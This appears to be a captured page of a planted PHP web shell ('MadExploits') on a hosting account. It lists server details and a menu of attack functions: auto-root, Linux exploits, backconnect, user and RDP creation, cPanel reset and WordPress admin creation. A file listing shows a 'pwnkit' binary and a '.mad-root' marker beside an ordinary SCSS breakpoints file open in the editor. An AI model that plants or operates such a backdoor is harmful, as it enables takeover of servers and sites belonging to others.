Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
www /
assets /
sass /
libs /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
_breakpoints.scss
4.47
KB
-rw-r--r--
_flexgrid.scss
7.62
KB
-rw-r--r--
_functions.scss
1.97
KB
-rw-r--r--
_grid.scss
2.38
KB
-rw-r--r--
_mixins.scss
1.8
KB
-rw-r--r--
_vars.scss
1.35
KB
-rw-r--r--
_vendor.scss
7.19
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _breakpoints.scss
// breakpoints.scss v0.1-dev | @ajlkn | MIT licensed */ // Vars. /// Breakpoints. /// @var {list} $breakpoints: () !global; // Mixins. /// Sets breakpoints. /// @param {map} $x Breakpoints. @mixin breakpoints($x: ()) { $breakpoints: $x !global; } /// Wraps @content in a @media block targeting a specific orientation. /// @param {string} $orientation Orientation. @mixin orientation($orientation) { @media screen and (orientation: #{$orientation}) { @content; } } /// Wraps @content in a @media block using a given query. /// @param {string} $query Query. @mixin breakpoint($query: null) { $breakpoint: null; $op: null; $media: null; // Determine operator, breakpoint. // Greater than or equal. @if (str-slice($query, 0, 2) == '>=') { $op: 'gte'; $breakpoint: str-slice($query, 3); } // Less than or equal. @elseif (str-slice($query, 0, 2) == '<=') { $op: 'lte'; $breakpoint: str-slice($query, 3); } // Greater than. @elseif (str-slice($query, 0, 1) == '>') { $op: 'gt'; $breakpoint: str-slice($query, 2); } // Less than. @elseif (str-slice($query, 0, 1) == '<') { $op: 'lt'; $breakpoint: str-slice($query, 2); } // Not. @elseif (str-slice($query, 0, 1) == '!') { $op: 'not'; $breakpoint: str-slice($query, 2); } // Equal. @else { $op: 'eq'; $breakpoint: $query; } // Build media. @if ($breakpoint and map-has-key($breakpoints, $breakpoint)) { $a: map-get($breakpoints, $breakpoint); // Range. @if (type-of($a) == 'list') { $x: nth($a, 1); $y: nth($a, 2); // Max only. @if ($x == null) { // Greater than or equal (>= 0 / anything) @if ($op == 'gte') { $media: 'screen'; } // Less than or equal (<= y) @elseif ($op == 'lte') { $media: 'screen and (max-width: ' + $y + ')'; } // Greater than (> y) @elseif ($op == 'gt') { $media: 'screen and (min-width: ' + ($y + 1) + ')'; } // Less than (< 0 / invalid) @elseif ($op == 'lt') { $media: 'screen and (max-width: -1px)'; } // Not (> y) @elseif ($op == 'not') { $media: 'screen and (min-width: ' + ($y + 1) + ')'; } // Equal (<= y) @else { $media: 'screen and (max-width: ' + $y + ')'; } } // Min only. @else if ($y == null) { // Greater than or equal (>= x) @if ($op == 'gte') { $media: 'screen and (min-width: ' + $x + ')'; } // Less than or equal (<= inf / anything) @elseif ($op == 'lte') { $media: 'screen'; } // Greater than (> inf / invalid) @elseif ($op == 'gt') { $media: 'screen and (max-width: -1px)'; } // Less than (< x) @elseif ($op == 'lt') { $media: 'screen and (max-width: ' + ($x - 1) + ')'; } // Not (< x) @elseif ($op == 'not') { $media: 'screen and (max-width: ' + ($x - 1) + ')'; } // Equal (>= x) @else { $media: 'screen and (min-width: ' + $x + ')'; } } // Min and max. @else { // Greater than or equal (>= x) @if ($op == 'gte') { $media: 'screen and (min-width: ' + $x + ')'; } // Less than or equal (<= y) @elseif ($op == 'lte') { $media: 'screen and (max-width: ' + $y + ')'; } // Greater than (> y) @elseif ($op == 'gt') { $media: 'screen and (min-width: ' + ($y + 1) + ')'; } // Less than (< x) @elseif ($op == 'lt') { $media: 'screen and (max-width: ' + ($x - 1) + ')'; } // Not (< x and > y) @elseif ($op == 'not') { $media: 'screen and (max-width: ' + ($x - 1) + '), screen and (min-width: ' + ($y + 1) + ')'; } // Equal (>= x and <= y) @else { $media: 'screen and (min-width: ' + $x + ') and (max-width: ' + $y + ')'; } } } // String. @else { // Missing a media type? Prefix with "screen". @if (str-slice($a, 0, 1) == '(') { $media: 'screen and ' + $a; } // Otherwise, use as-is. @else { $media: $a; } } } // Output. @media #{$media} { @content; } }
Close